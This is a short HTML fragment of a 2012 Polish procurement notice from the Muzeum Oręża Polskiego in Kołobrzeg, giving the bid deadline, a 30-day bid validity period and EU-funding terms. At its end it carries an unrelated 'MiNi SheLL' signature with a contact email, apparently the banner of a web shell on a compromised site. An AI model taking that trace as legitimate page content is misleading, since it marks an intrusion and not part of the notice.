<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 12:00, miejsce: Muzeum Oręża polskiego, 78-100 Kołobrzeg, ul. Armii Krajowej 13, sekretariat, I pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com